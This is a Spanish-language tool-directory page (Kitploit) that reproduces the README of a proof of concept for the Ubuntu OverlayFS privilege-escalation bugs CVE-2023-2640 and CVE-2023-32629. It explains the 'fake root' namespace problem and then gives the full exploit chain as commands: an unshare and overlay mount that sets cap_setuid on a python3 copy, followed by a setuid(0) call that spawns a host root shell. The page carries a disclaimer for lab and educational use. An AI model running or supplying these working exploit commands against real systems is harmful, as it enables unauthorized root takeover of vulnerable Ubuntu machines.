Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2023-2640-CVE-2023-32629-Interactive-PoC — Un exploit limpio, interactivo y de múltiples pasos para la escalada local de privilegios (LPE) en Ubuntu OverlayFS (GameOver(lay)) que escapa del sandbox del espacio de nombres de usuario para obtener una verdadera shell root del host. | Kitploit
Herramientas/GitHubGitHub/amar-imamovic/cve-2023-2640-cve-2023-32629-interactive-poc
Escalada de PrivilegiosAnálisis de VulnerabilidadesExplotaciónPruebas de PenetraciónAprendizaje y EducaciónLabs y Práctica
GitHubamar-imamovic/cve-2023-2640-cve-2023-32629-interactive-poc

CVE-2023-2640-CVE-2023-32629-Interactive-PoC

Un exploit limpio, interactivo y de múltiples pasos para la escalada local de privilegios (LPE) en Ubuntu OverlayFS (GameOver(lay)) que escapa del sandbox del espacio de nombres de usuario para obtener una verdadera shell root del host.

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Ver Repositorio
4hace 3 mesesAún no revisado

CVE-2023-2640 & CVE-2023-32629 (GameOverLay) - PoC de Escape a Root Real del Host

Una prueba de concepto (PoC) interactiva y de múltiples pasos de Escalada Local de Privilegios (LPE) dirigida a las vulnerabilidades OverlayFS del kernel de Ubuntu Linux (CVE-2023-2640 / CVE-2023-32629).

A diferencia de los one-liners automatizados estándar que atrapan su shell interactivo dentro de un User Namespace (Fake Root) restrictivo, esta metodología divide la secuencia del exploit para obtener de forma segura un shell root real e irrestricto del host.


El Problema del "Fake Root" Explicado

Muchos exploits públicos combinan la configuración y la ejecución en una única secuencia de shell automatizada como esta: unshare -rm sh -c "mkdir l u w m && ... && touch m/*; python3 -c '...'"

Debido a que la carga útil de ejecución de Python está incrustada dentro de las comillas dobles de unshare, se ejecuta internamente dentro del sandbox del espacio de nombres de usuario.

  • El Resultado: Su ID de usuario aparece como uid=0(root), pero su shell está aislado criptográficamente del host. Si intenta ver el directorio root del host (cd /root), obtendrá un error de Permission Denied.

La Solución

Esta PoC divide el proceso en dos etapas lógicas distintas:

  1. Armar dentro del Sandbox: Ejecute unshare para falsificar los permisos de root solo el tiempo suficiente para explotar la falla ovl_copy_up de OverlayFS, filtrando una capacidad setcap cap_setuid+eip de alto privilegio en una carpeta local de binarios de Python.
  2. Ejecutar fuera del Sandbox: El espacio de nombres se cierra automáticamente. El binario con el backdoor se ejecuta entonces directamente desde el contexto real del host como un usuario normal sin privilegios. El kernel lee la flag filtrada, permite os.setuid(0) y le otorga privilegios reales de administración a nivel de host.

Detalles de la Vulnerabilidad

  • CVE-2023-2640: Restricción incorrecta de las capacidades de archivos dentro de los espacios de nombres de usuario en el OverlayFS del kernel de Ubuntu.
  • CVE-2023-32629: Fallo en la función ovl_copy_up_meta_inode_data del kernel de Ubuntu que permite omitir por completo las comprobaciones de validación durante la migración de archivos.
  • Sistemas Afectados: Ubuntu 22.04 LTS con versiones del kernel de Linux inferiores a 6.2.0-26-generic.

Instrucciones de Uso

Método 1: El Script Automatizado (Recomendado)

  1. Clone o descargue exploit.sh en la máquina objetivo (por ejemplo, dentro de /tmp).
  2. Otorgue permisos de ejecución y ejecútelo:
root@kitploit:~
chmod +x exploit.sh
./exploit.sh

Método 2: Ejecución Manual Interactiva Línea por Línea

Si está trabajando con una reverse shell volátil, ejecute estos comandos completamente por separado, pulsando Enter después de cada línea:

root@kitploit:~
# 1. Clean workspace environment 
cd /tmp && rm -rf l u w m

# 2. Forge the backdoor within the temporary namespace sandbox
unshare -rm sh -c "mkdir l u w m && cp /usr/bin/python3 l/ && setcap cap_setuid+eip l/python3 && mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*"

# 3. Trigger execution on the real host to claim true root
./u/python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'

Verifique sus privilegios reales comprobando su perfil de usuario actual:

root@kitploit:~
whoami
cat /root/root.txt

Créditos y Agradecimientos

La mecánica base del exploit utilizada en este refactor interactivo fue descubierta y documentada originalmente por los investigadores de seguridad Liav Eliyahu y g1vi.

Aviso Legal

Este repositorio se crea estrictamente con fines educativos, de investigación de seguridad y de pruebas de penetración autorizadas (como los laboratorios HackTheBox / OffSec). El autor no asume ninguna responsabilidad por el uso indebido, los intentos de acceso no autorizado o los daños a la infraestructura causados por estos materiales. Úselo de manera responsable.

Descargar herramienta